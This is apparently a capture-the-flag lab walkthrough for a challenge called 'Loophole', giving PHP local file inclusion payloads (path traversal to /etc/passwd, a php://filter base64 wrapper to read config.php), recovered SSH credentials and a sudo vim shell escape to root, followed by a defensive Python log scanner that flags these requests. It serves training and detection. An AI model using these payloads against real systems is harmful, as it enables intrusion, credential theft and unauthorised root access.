
Loophole

An internal document viewer built in a hurry left its file-inclusion logic wide open. The config file is right there in the web root — PHP just won't show it to you. Figure out how to read source without executing it, recover the credentials, and turn a sudo misconfig into a root shell.

Walkthrough

Objective

Exploit a PHP Local File Inclusion vulnerability to read application source, recover credentials, and escalate to root via a sudo misconfiguration.

Attack Narrative

IntraView was deployed in "development mode" without sanitizing the ?page= parameter. The developer stored service-account credentials in a PHP config file in the web root — thinking PHP's execution model would protect them. It doesn't. PHP stream wrappers bypass execution and return raw source, revealing everything needed to SSH in and escalate.

Prerequisites

  • HTTP enumeration basics (curl, browser DevTools).
  • Familiarity with PHP stream wrappers (php://filter).
  • Base64 decoding.
  • GTFOBins methodology for sudo escalation.

Phase 1: Web Reconnaissance

  1. Scan the target — ports 22 (SSH) and 80 (HTTP).
  2. Browse to http://TARGET/ — IntraView document portal.
  3. Identify the ?page= parameter in the URL.
  4. Read the Documentation page — note that path validation is disabled.

Phase 2: Confirm LFI

Test for path traversal:

http://TARGET/?page=../../../etc/passwd

The passwd file renders in the page. LFI is confirmed.

Phase 3: Read PHP Source via Filter Wrapper

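Direct inclusion of config.php produces no output: PHP executes the file, and the file only defines constants, so nothing is printed.
Use the php://filter stream wrapper to base64-encode the file before inclusion. The encoded stream contains no PHP tags, so the include prints it as plain text instead of running it: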

http://TARGET/?page=php://filter/convert.base64-encode/resource=config.php

Copy the base64 output and decode:

echo "<base64_string>" | base64 -d

The source reveals SSH credentials:

define('SVC_USER', 'webdev');
define('SVC_PASS', 'L0c4lF1l3!');

Phase 4: Initial Access

ssh webdev@TARGET
cat ~/user.txt

Phase 5: Privilege Escalation

sudo -l
# (root) NOPASSWD: /usr/bin/vim

Escalate via vim GTFOBins:

sudo vim -c ':!/bin/bash'
cat /root/root.txt

Troubleshooting

  • LFI shows nothing: confirm the path traversal reaches a readable file — try /etc/hostname first.
  • filter output is garbled: copy the entire base64 block without line breaks before decoding.
  • sudo vim blocked: check exact sudo rule — GTFOBins lists multiple vim escape methods.

Verification Checklist

  • LFI confirmed via /etc/passwd traversal.
  • PHP filter wrapper used to read config.php source.
  • Credentials decoded and SSH access obtained.
  • Root shell achieved via sudo vim.
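
The requests from Phase 2 and Phase 3 stand out in web server access logs, because a page name picked from the portal's menu would not contain a parent-directory segment or a stream-wrapper URL. The following is an added example, not part of the original walkthrough: it scans constructed Apache-style log lines for both patterns in the page parameter. The log format, sample lines and function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in Apache common-log style (documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /?page=home HTTP/1.1" 200 1532',
    '198.51.100.7 - - [01/Jan/2025:10:00:09 +0000] "GET /?page=../../../etc/passwd HTTP/1.1" 200 2210',
    '198.51.100.7 - - [01/Jan/2025:10:00:15 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 688',
    '198.51.100.7 - - [01/Jan/2025:10:00:21 +0000] "GET /?page=%252e%252e%252fetc%252fhostname HTTP/1.1" 200 410',
    '203.0.113.20 - - [01/Jan/2025:10:01:02 +0000] "GET /?page=docs/v1..2/notes HTTP/1.1" 200 1532',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)   # php://, data://, file://, ...
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')        # ".." as a whole path segment


def decode_all(value, max_rounds=3):
    """Undo repeated URL encoding so %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return why a decoded page= value is suspicious, or None if it looks benign."""
    if SCHEME_RE.match(value):
        return "stream-wrapper"
    if TRAVERSAL_RE.search(value):
        return "path-traversal"
    if value.startswith("/"):
        return "absolute-path"
    return None


def scan(lines, param="page"):
    """Return (line_number, reason, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = match.group(1).partition("?")[2]
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            value = decode_all(raw)
            reason = classify(value)
            if reason:
                hits.append((number, reason, value))
    return hits
```

Calling scan(SAMPLE_LOG) flags lines 2, 3 and 4 and leaves the ordinary page names on lines 1 and 5 alone.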

Tips and Tricks

  • Always try /etc/passwd first to confirm LFI — it's readable and unambiguous.
  • php://filter/convert.base64-encode/resource=<file> works on any file PHP can open, not just PHP files.
  • Check /proc/self/environ, /var/log/apache2/access.log, and /etc/hosts for additional data points.
  • GTFOBins: sudo vim -c ':!/bin/bash' drops you to a shell as root instantly.

Useful Commands

curl "http://TARGET/?page=../../../etc/passwd"
curl "http://TARGET/?page=php://filter/convert.base64-encode/resource=config.php" | grep -oP '[A-Za-z0-9+/=]{20,}' | base64 -d
sudo vim -c ':!/bin/bash'
